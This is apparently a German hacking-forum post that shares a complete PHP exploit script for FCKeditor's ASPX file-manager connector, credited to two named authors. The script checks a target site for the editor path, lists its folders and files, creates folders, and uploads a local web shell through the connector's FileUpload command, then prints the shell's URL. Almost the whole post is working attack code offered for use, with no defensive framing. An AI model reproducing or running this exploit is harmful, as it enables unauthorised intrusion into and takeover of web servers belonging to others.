Keine Antworten in diesem Thema

[Dr. Spic]

<?php
/** To prevent of time out **/
set_time_limit(0);
/** Error reporting **/
//error_reporting(0);
/** Necessary variables **/
$site = $argv[1];
/** Curl function with appropriate adjustments **/
function CurlPost($url='localhost',$data=array())
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_TIMEOUT,50);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
return curl_exec($ch);
curl_close($ch);
}
function AppropriateName($FileName)
{
return str_replace('"','',str_replace('<File name="','',str_replace('<Folder name="','',$FileName)));
}
/** Initializing **/
echo '					  ______
				   .-"	  "-.
				  /		    \
				 |			  |
				 |,  .-.  .-.  ,|
				 | )(__/  \__)( |
				 |/	 /\	 \|
	   (@_	   (_	 <img src='http://www.toolbase.bz/board/public/style_emoticons/<#EMO_DIR#>/_0021_^^.png' class='bbc_emoticon' alt='^^' />	 _)
  _	 ) \_______\__|IIIIII|__/__________________________
(_)@8@8{}<________|-\IIIIII/-|___________________________>
	    )_/	    \		  /
	   (@		   `--------`',"\n\n";
echo '/--------------------------------------------------------------\\',"\n";
echo '| Exploit by Yashar shahinzadeh & Mormoroth ',"\n";
echo '| Credit goes for http://ha.cker.ir & http://y-shahinzadeh.ir ',"\n";
echo '\--------------------------------------------------------------/',"\n\n";
/** Some information to user **/
echo '['.date("H:i:s").'] Site: ',$site,"\n";
echo '['.date("H:i:s").'] Checking whether if the fckeditor exists or not...',"\n";
/** Sending a HTTP request to fckeditr/ **/
$CheckFCK = get_headers($site.'fckeditor/');
/** Checking whether if the fckeditor exists or not **/
if(strstr($CheckFCK[0],'404')!==FALSE)
{
echo '['.date("H:i:s").'] fckeditor/ path not found',"\n";
exit();
}
/** FCKeditor path found **/
echo '['.date("H:i:s").'] The path seems to be existed...',"\n";
/** Options of choices **/
echo '['.date("H:i:s").'] What do you want to do? [(1)Getting folders and files,(2)Upload a file,(3)Create a folder] ';
$method = fopen('php://stdin','r');
$method = trim(fgets($method));
switch($method)
{
case '1':

echo '['.date("H:i:s").'] Please enter a path? ';
$path = fopen('php://stdin','r');
$path = trim(fgets($path));

/** URL to get files and folders **/
$GetFilesAndFoltersURL = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder='.$path;

echo '['.date("H:i:s").'] Gathreing...',"\n";

/** Gathring names **/
$content = file_get_contents($GetFilesAndFoltersURL);

/** File(s) **/
preg_match_all("/(<File name=\").*?(\")/is",$content,$files);

/** Folder(s) **/
preg_match_all("/(<Folder name=\").*?(\")/is",$content,$folders);
echo '['.date("H:i:s").'] Found ',count($folders[0]),' folder(s) and ',count($files[0])," file(s)\n\n";
sleep(1);

echo '/--------------------------------------------------------------\\',"\n";

/** Printing folder(s) **/
foreach($folders[0] as $FileName)
{
  echo '| [Folder] '. AppropriateName($FileName),"\n";
}

/** Printing file(s) **/
foreach($files[0] as $FileName)
{
  echo '| [File] '. AppropriateName($FileName),"\n";
}
echo '\--------------------------------------------------------------/',"\n\n";

break;
case '2':

  /** Gathering shell name located in same directory **/
  echo '['.date("H:i:s").'] Please provide a shell name: ';
  $ShellName = fopen('php://stdin','r');
  $ShellName = trim(fgets($ShellName));
 
  /** Path **/
  echo '['.date("H:i:s").'] Please enter a path? ';
  $path = fopen('php://stdin','r');
  $path = trim(fgets($path));

  /** Checking if the local shell exists or not **/
  if(file_exists($ShellName)===FALSE)
  {
   echo '['.date("H:i:s").'] File does not exist in current directory!',"\n";
   exit();
  }else echo '['.date("H:i:s").'] Shell loaded...',"\n";
 
  /** Upload data **/
  $data['NewFile'] = '@'.$ShellName;
 
  /** Upload URL **/
  $UploadURL = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder='.$path;
 
  echo '['.date("H:i:s").'] Uploading shell...',"\n";
 
  /** Uploading shell **/
  CurlPost($UploadURL,$data);
 
  /** Priting shell **/
  $PureSit = explode('/',$site);
 
  echo '['.date("H:i:s").'] SHELL: http://',$PureSit[2],'/uploadFiles/File/',$path,$ShellName,"\n";

break;
case '3':

  echo '['.date("H:i:s").'] Please enter a path? ';
  $path = fopen('php://stdin','r');
  $path = trim(fgets($path));

  echo '['.date("H:i:s").'] Provide folder name: ';
  $name = fopen('php://stdin','r');
  $name = trim(fgets($name));
  /** URL to get files and folders **/
  $CreateFolder = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder='.$path.'&NewFolderName='.$name;

  echo '['.date("H:i:s").'] Creating...',"\n";

  /** Gathring names **/
  $content = file_get_contents($CreateFolder);
  echo '['.date("H:i:s").'] Folder was created successfully.',"\n";
  sleep(1);

break;
}

Please Login HERE or Register HERE to see this link!